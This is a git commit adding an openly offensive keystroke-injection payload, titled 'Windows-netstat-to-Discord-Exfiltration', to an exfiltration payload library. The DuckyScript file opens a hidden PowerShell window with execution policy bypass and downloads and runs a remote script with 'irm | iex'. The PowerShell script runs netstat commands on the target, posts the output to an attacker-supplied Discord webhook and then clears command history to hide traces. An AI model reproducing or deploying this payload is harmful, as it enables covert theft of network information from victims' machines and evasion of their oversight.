Merge pull request #171 from aleff-github/patch-38

Windows-netstat-to-Discord-Exfiltration
2023-06-12 14:04:43 -04:00 · 2023-06-12 14:04:43 -04:00 · 307768512c
parent dd7d3fbc11 83f97b85cc
commit 307768512c
3 changed files with 159 additions and 0 deletions
--- a/payloads/library/exfiltration/Windows-netstat/README.md
+++ b/payloads/library/exfiltration/Windows-netstat/README.md
@ -0,0 +1,41 @@
+# Windows netstat ✅
+
+A script used to stole target netstat status.
+
+**Category**: Exfiltration
+
+## Description
+
+This script will stole target netstat status.
+
+Opens PowerShell hidden, grabs netstat status, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
+
+Then it cleans up traces of what you have done after.
+
+## Getting Started
+
+### Dependencies
+
+* An internet connection
+* Windows 10,11
+
+### Executing program
+
+* Plug in your device
+* Invoke the indicated commands 
+* Invoke-WebRequest will be entered in the Run Box to send the content
+
+### Settings
+Put 1 on the function that you want to active, else 0.
+Functions available:
+- default (*or simple 'netstat' command*)
+- routing_table **$r**
+- listening_canonical **$lc**
+- listening_numerical **$ln**
+- all_canonical **$ac**
+- all_numerical **$an**
+- offload **ot**
+- proto **$p "\<protocol>"**
+    - *In this option you must put the protocol that you want to monitor, for example $proto="TCP" if you want to monitor TCP, else leave blank, so $proto="".*
+
+
--- a/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1
+++ b/payloads/library/exfiltration/Windows-netstat/Windows-netstat.ps1
@ -0,0 +1,79 @@
+
+# Discord send function
+function exfiltration () {
+	param(
+		[Parameter (Mandatory = $true, Position=0)] [String]$command,
+		[Parameter (Mandatory = $true, Position=1)] [String]$text
+	)
+	# Loop for Discord
+	$ConstantLimitForRestMethod = 1999
+	$TMP_Body = @{
+		'username' = $command
+		'content' = ""
+	}
+	for($i = 0; $i -lt $text.Length; $i+=$ConstantLimitForRestMethod){
+		try {
+			$TMP_Body = @{
+				'username' = $command
+				'content' = $text.Substring($i, $ConstantLimitForRestMethod)
+			}
+		} catch [ArgumentOutOfRangeException] {
+			if($text.Length-$i -gt 0){
+				$TMP_Body = @{
+				'username' = $command
+				'content' = $text.Substring($i, $text.Length-$i)
+				}
+			} else {
+				break
+			}
+		}
+		Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($TMP_Body | ConvertTo-Json)
+	}
+}
+
+# send command format
+function send_command(){
+	param(
+		[Parameter (Mandatory = $true, Position=0)] [String]$cmd
+	)
+	$out = Invoke-Expression $cmd
+	(exfiltration $cmd [string]$out)
+}
+
+# Settings
+if ( $d -eq "1") {
+	$cmd = "netstat"
+	(send_command $cmd)
+}
+if ( $r -eq "1") {
+	$cmd = "netstat -r"
+	(send_command $cmd)
+}
+if ( $lc -eq "1") {
+	$cmd = "netstat -af"
+	(send_command $cmd)
+}
+if ( $ln -eq "1") {
+	$cmd = "netstat -an"
+	(send_command $cmd)
+}
+if ( $ac -eq "1") {
+	$cmd = "netstat -qf"
+	(send_command $cmd)
+}
+if ( $an -eq "1") {
+	$cmd = "netstat -qn"
+	(send_command $cmd)
+}
+if ( $o -eq "1") {
+	$cmd = "netstat -t"
+	(send_command $cmd)
+}
+if ( $p -ne "" ) {
+	# format $proto="TCP"
+	$cmd = "netstat -ps " + $p
+	(send_command $cmd)
+}
+
+# Clear the PowerShell command history
+Clear-History
--- a/payloads/library/exfiltration/Windows-netstat/payload.txt
+++ b/payloads/library/exfiltration/Windows-netstat/payload.txt
@ -0,0 +1,39 @@
+REM ###################################################################
+REM #                                                                 |
+REM # Title        : Windows-netstat-to-Discord-Exfiltration          |
+REM # Author       : Aleff                                            |
+REM # Version      : 1.0                                              |
+REM # Category     : Exfiltration                                     |
+REM # Target       : Windows 10-11                                    |
+REM #                                                                 |
+REM ###################################################################
+
+REM Put 1 on the function that you want to active, else 0. Functions available:
+REM - default (simple 'netstat' command)
+REM - routing_table $r
+REM - listening_canonical $lc
+REM - listening_numerical $ln
+REM - all_canonical $ac
+REM - all_numerical $an
+REM - offload ot
+REM - proto $p "<protocol>"
+REM - - In this option you must put the protocol that you want to monitor, for example $p="TCP" if you want to monitor TCP, else leave blank, so $p="".
+
+REM Requirements: Internet connection
+REM 
+
+REM REQUIRED - Provide your Discord WEBHOOK
+DEFINE WEBHOOK https://discordapp.com/api/webhooks/<webhook_id>/<token>
+
+DELAY 2000
+GUI r
+DELAY 250
+DELETE
+STRING powershell -w h -ep bypass $discord='
+
+STRING WEBHOOK
+
+REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be Windows-netstat.ps1
+DEFINE PAYLOAD example.com
+STRING ';$d='1';$r='1';$lc='1';$ln='1';$ac='1';$an='1';$o='1';$p='TCP';irm PAYLOAD | iex
+ENTER